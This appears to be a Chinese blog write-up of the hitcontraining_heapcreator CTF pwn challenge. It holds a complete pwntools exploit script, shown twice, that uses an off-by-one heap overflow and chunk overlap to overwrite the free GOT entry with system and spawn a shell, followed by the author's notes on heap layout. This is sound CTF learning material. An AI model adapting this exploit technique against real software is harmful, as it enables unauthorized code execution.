hitcontraining_heapcreator 一點小疑惑
阿新 • • 發佈:2021-09-28
exp:
from pwn import * from LibcSearcher import LibcSearcher #sh=remote("node3.buuoj.cn",25984) sh = process("./heapcreator") elf=ELF('./heapcreator') def create(length,value): sh.recvuntil("Your choice :") sh.sendline("1") sh.recvuntil("Size of Heap : ") sh.sendline(str(int(length))) sh.recvuntil("Content of heap:") sh.sendline(value) def edit(index,value): sh.recvuntil("Your choice :") sh.sendline("2") sh.recvuntil("Index :") sh.sendline(str(int(index))) sh.recvuntil("Content of heap : ") sh.sendline(value) def show(index): sh.recvuntil("Your choice :") sh.sendline("3") sh.recvuntil("Index :") sh.sendline(str(int(index))) def delete(index): sh.recvuntil('Your choice :') sh.sendline('4') sh.recvuntil('Index :') sh.sendline(str(int(index))) create(0x18,'aaaa') create(0x10,'bbbb') create(0x10,'cccc') create(0x10,'/bin/sh') edit(0,'a'*0x18+'\x81') delete(1) size = b'\x08'.ljust(8,b'\x00') payload = b'd'*0x40+ size + p64(elf.got['free']) create(0x70,payload) gdb.attach(sh) show(2) sh.recvuntil('Content : ') free_addr = u64(sh.recvuntil('Done')[:-5].ljust(8,b'\x00')) libc=LibcSearcher("free",free_addr) system_addr=free_addr+libc.dump("system")-libc.dump("free") edit(2,p64(system_addr)) delete(3) sh.interactive()
from pwn import * from LibcSearcher import LibcSearcher #sh=remote("node3.buuoj.cn",25984) sh = process("./heapcreator") elf=ELF('./heapcreator') def create(length,value): sh.recvuntil("Your choice :") sh.sendline("1") sh.recvuntil("Size of Heap : ") sh.sendline(str(int(length))) sh.recvuntil("Content of heap:") sh.sendline(value) def edit(index,value): sh.recvuntil("Your choice :") sh.sendline("2") sh.recvuntil("Index :") sh.sendline(str(int(index))) sh.recvuntil("Content of heap : ") sh.sendline(value) def show(index): sh.recvuntil("Your choice :") sh.sendline("3") sh.recvuntil("Index :") sh.sendline(str(int(index))) def delete(index): sh.recvuntil('Your choice :') sh.sendline('4') sh.recvuntil('Index :') sh.sendline(str(int(index))) create(0x18,'aaaa') create(0x10,'bbbb') create(0x10,'cccc') create(0x10,'/bin/sh') edit(0,'a'*0x18+'\x81') delete(1) size = b'\x08'.ljust(8,b'\x00') payload = b'd'*0x40+ size + p64(elf.got['free']) create(0x70,payload) gdb.attach(sh) show(2) sh.recvuntil('Content : ') free_addr = u64(sh.recvuntil('Done')[:-5].ljust(8,b'\x00')) libc=LibcSearcher("free",free_addr) system_addr=free_addr+libc.dump("system")-libc.dump("free") edit(2,p64(system_addr)) delete(3) sh.interactive()
1.為什麼要將chunk1釋放後再進行malloc,然後填入資料。而不是直接填入資料?
假如直接填入資料的話,改變一下exp
然後檢視堆發現
chunk1的size沒有變,所以最多還是隻能輸入0x10大小的資料,所以我們要先free掉,然後再malloc(0x70),讓chunk的size變成0x70,然後填充資料
2.如圖
為什麼填入的資料會從0x1616050開始?
因為每次add都會創立兩個chunk,第一個chunk就是0x1616070處,在後面將會被覆蓋,所以我會有這個疑問。第二個chunk,也就是填入資料的chunk,就在0x1616040,0x1616048是size,0x1616050是資料儲存的地方。